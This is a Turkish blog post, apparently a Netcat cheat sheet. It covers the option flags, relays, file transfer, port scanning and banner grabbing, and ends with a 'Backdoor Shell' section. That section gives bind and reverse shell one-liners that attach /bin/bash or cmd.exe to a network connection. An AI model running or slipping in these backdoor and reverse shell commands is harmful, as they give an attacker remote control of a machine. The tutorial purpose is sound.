NETCAT

Amaç

Bu doküman, Netcat’in hem Linux hem de UNIX sistemlerdeki çeşitli kullanım şekillerinden bahsetmektedir.

Temel Kullanım

Netcat İstemci

#nc [Hedef IP] [Port]

Vermiş olduğunuz hedef IP’nin yine vermiş olduğunuz porta bağlantı kurar.

Netcat Dinleyici

#nc –l –p  [localport]

Yerelde verdiğiniz portta Netcat dinleyici kurar.

Netcat Komutlar

#nc [options] [Hedef IP Adresi] [port/lar]

[Hedef IP Adresi] kısmı basit olarak karşı tarafın IP adresi ya da domain adıdır.

-l         : Listen mod ( dinleme modu ) (varsayılan olarak client moddadır)

-L        : Listen harder (yalnızca Netcat’in Windows versiyonu için desteklidir. Bir istemci bağlantısı koptuktan sonra tekrar dinlemeyi otomatik başlatmak amacıyla Netcat’e kalıcı bağlantı sağlar.)

-u        : UDP mod (varsayılan TCP)

-p        : Yerel port (Dinleme modunda bu port dinlenir, client modda ise bütün paketlerin gönderildiği kaynak porttur.)

-e         : Kurulan bağlantıdan sonra program çalıştırmaya yarar.

n        : DNS sorgusu yapmaması için kullanılır.

-z         : Zero I/O mod (Hiçbir veri göndermez)

-wN     :Bağlantı timeout, STDIN kapandıktan sonra N saniye bekler.Bir Netcat istemci veya dinleyici bu komut ile bağlantı kurması için N sn bekler. Eğer bu süre zarfında bağlantı gerçekleşmezse Netcat çalışmayı durdurur.

-v         :Ayrıntı modu. Meydana gelen Standart Error hatayı ekrana yazdırır.

-vv       :Çok Ayrıntı modu. Standart Error hakkında daha fazla ayrıntı yazdırır.

Netcat – Windows

İstemci-Dinleyici Transfer

C: \> echo nc [Hedef IP] [Hedef Port] > deneme.bat

C: \> nc –l –p [YerelPort] –e deneme.bat

YerelPort’dan Hedef IP’nin Hedef Portuna kurulan bağlantı ile paketler gönderilir.

Dinleyici-Dinleyici Transfer

C: \> echo nc –l –p [YerelPort2] > deneme.bat

C: \> nc –l –p [YerelPort1] –e deneme.bat

YerelPort1’de kurulan bir bağlantı ile YerelPort2 ‘ye paket gönderimi şeklinde bir aktarım oluşturulur.

İstemci-İstemci Transfer

C: \> echo nc [Sonraki IP] [Port 2] > deneme.bat

C: \> nc [Önceki IP] [Port 1] -e deneme.bat

Önceki IP’nin Port 1 ‘inden Sonraki IP’nin Port 2’sine paket gönderimi ile aktarım olur.

Dosya Transferi

İstemci-Dinleyici

#nc –l –p [Yerel Port] > [giden dosya]

Yerel Port dinlenir ve “giden dosya” çıktısı yüklenir.

#nc –w3 [Hedef IP] [Hedef Port] < [gelen dosya]

“gelen dosya” Hedef IP’nin Hedep portuna push edilir.

Dinleyici-İstemci

#nc –l –p [Yerel Port] < [gelen dosya]

Yerel Port dinlenir ve “gelen dosya” push etmeye hazırlanır.

#nc –w3 [Hedef IP] [Hedef Port] > [giden dosya]

Hedef IP’nin Hedef Portu ile bağlantı kurulur ve “giden dosya” çekilir.

TCP Port Tarama

IP Adres Port Tarama

#nc –v –n –z –w1 [Hedef IP] [İlk Port]-[SonPort]

Belirtilen port aralığında hedef IP’ye –n (isimleri çözmeden) –z (herhangi bir data göndermeden) –w1 Bağlantı kurmak için 1 sn ‘den daha fazla beklemeden port taraması gerçekleştirme işlemine başlar.

TCP Banner Grabber

#echo “ “ | nc –v –n –w1 [Hedef IP] [İlkPort]- [Son Port]

Backdoor Shell 

Linux backdoor shell dinleme

#nc –l  -p [Yerel Port] –e /bin/bash

Windows backdoor shell dinleme

C: \> nc –l –p [Yerel Port] –e cmd.exe

Tersine (reverse) backdoor shell dinleme (Linux)

# nc [Senin IP adresin] [port] –e /bin/bash

Tersine (reverse)backdoor shell dinleme (Windows)

C: \> nc [Senin IP adresin] [port]–e cmd.exe

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

w

Connecting to %s